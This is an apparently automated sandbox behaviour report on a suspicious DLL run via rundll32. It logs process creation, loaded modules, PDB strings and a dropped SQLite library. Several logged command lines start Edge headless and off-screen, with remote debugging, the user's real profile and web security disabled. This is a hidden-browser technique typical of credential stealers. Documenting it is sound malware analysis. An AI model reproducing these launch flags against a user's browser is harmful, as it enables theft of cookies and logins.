            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1484 --field-trial-handle=1428,i,15056660553952727470,9252583371032052914,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3Jump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9268 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9231 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9582 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1584 --field-trial-handle=1428,i,17945505886261408641,13113547458028761816,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3Jump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1512 --field-trial-handle=1404,i,8570248948414789044,17269091163832771516,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1580 --field-trial-handle=1496,i,17156741464264009395,10585309956267009794,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1504 --field-trial-handle=1404,i,7222753251508312572,843562090488949947,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1660 --field-trial-handle=1472,i,14150613680771438782,17375092338205965150,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
            Source: C:\Windows\System32\loaddll64.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\loaddll64.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\loaddll64.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\loaddll64.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\loaddll64.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\loaddll64.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\loaddll64.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: mP8rzGD7fG.dllStatic PE information: Image base 0x180000000 > 0x60000000
            Source: mP8rzGD7fG.dllStatic file information: File size 26218512 > 1048576
            Source: mP8rzGD7fG.dllStatic PE information: Raw size of .managed is bigger than: 0x100000 < 0x82a200
            Source: mP8rzGD7fG.dllStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xf96800
            Source: mP8rzGD7fG.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: mP8rzGD7fG.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: mP8rzGD7fG.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: mP8rzGD7fG.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: mP8rzGD7fG.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: mP8rzGD7fG.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: mP8rzGD7fG.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
            Source: mP8rzGD7fG.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdb source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdb source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Compression\Release\net8.0-windows\System.IO.Compression.pdb source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
            Source: Binary string: C:\Users\AnhXi\Downloads\Telegram Desktop\HK_NAVITE_DLL_v3_OKE\HK\bin\Release\net8.0\win-x64\native\oke.pdb source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp
            Source: Binary string: /_/artifacts/obj/EntityFramework/Release/netstandard2.1/EntityFramework.pdbSHA256kX source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
            Source: Binary string: C:\dev\sqlite\dotnet-private\System.Data.SQLite\obj\Release\netstandard2.1\System.Data.SQLite.pdb source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
            Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdbSHA256 source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
            Source: Binary string: System.Diagnostics.Process.ni.pdb source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdbSHA256(s source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp
            Source: Binary string: /_/artifacts/obj/EntityFramework/Release/netstandard2.1/EntityFramework.pdb source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp
            Source: Binary string: D:\a\cb\cb\cb\bld\bin\e_sqlite3\win\v142\plain\x64\e_sqlite3.pdb source: rundll32.exe, 00000003.00000002.3145159766.00007FFE11744000.00000002.00000001.01000000.0000000C.sdmp, rundll32.exe, 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmp, rundll32.exe, 0000000E.00000002.2592449610.000002C433C00000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdbSHA256 source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
            Source: Binary string: System.IO.Compression.ni.pdb source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
            Source: Binary string: C:\dev\sqlite\dotnet-private\System.Data.SQLite\obj\Release\netstandard2.1\System.Data.SQLite.pdbSHA256 source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
            Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdb source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
            Source: mP8rzGD7fG.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: mP8rzGD7fG.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: mP8rzGD7fG.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: mP8rzGD7fG.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: mP8rzGD7fG.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: mP8rzGD7fG.dllStatic PE information: section name: .managed
            Source: mP8rzGD7fG.dllStatic PE information: section name: hydrated
            Source: e_sqlite3.dll.14.drStatic PE information: section name: _RDATA
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9BCC82 push rbx; retn 000Ah14_2_00007FFDFB9BCC89
            Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\System32\e_sqlite3.dllJump to dropped file
            Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\System32\e_sqlite3.dllJump to dropped file
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
